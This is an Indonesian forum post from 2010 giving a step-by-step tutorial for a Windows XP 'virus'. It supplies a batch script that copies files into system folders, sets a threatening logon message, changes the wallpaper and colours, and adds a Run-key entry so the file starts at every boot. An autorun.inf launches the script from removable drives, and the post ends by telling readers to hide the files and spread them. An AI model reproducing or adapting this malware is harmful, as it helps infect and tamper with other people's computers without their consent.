Virus Modifikasi

View previous topic View next topic Go down

Virus Modifikasi

Post by Alex on Sat Oct 16, 2010 6:16 pm

wew...kalo denger title diatas mgkn kk2 kira ne nama virus nya,,eit itu artinya virus nya bisa di modifikasi sendiri kk..hahahahah
oya...sebelum gw posting gw perkenalkan diri dulu,nama saya ferre(pengen di panggil lux_ferre/lucifer)hahaha
gw bukan hacker,defacer,carder,ato apa...gw cuma info sharer,pembagi informasi, ok lanjut ke tutorial...

ne virus hanya bekerja di windows XP,soalnya gw edit ne pake XP gan,ga coba di OS lain...vir ini ga terlalu berbahaya juga..ntar juga tau deh..
n ini bukan virus pertamax,gw cuma dapat pencerahan dari seseorang dan belajar2 n edit...

1. buka notepad
2.massukin
Spoiler:
@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\C urrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

3.save dengan extensi .bat
4.bikin autorun.inf dengan script...
Spoiler:
[autorun]
open=nama_file.bat

5.save dengan extensi .inf
6.file2 tsb harus dalam 1 direktori
7.hidden n read-only the files
8.copy n bagikan,sebarkan,wkwkwkwkwk
9.sampai jumpa

Sumber : ini
avatar
Alex
V.I.P
V.I.P

Posting : 225
Points : 655
Reputation : 4
Join date : 2010-10-03
Location : Bandung

Back to top Go down

View previous topic View next topic Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum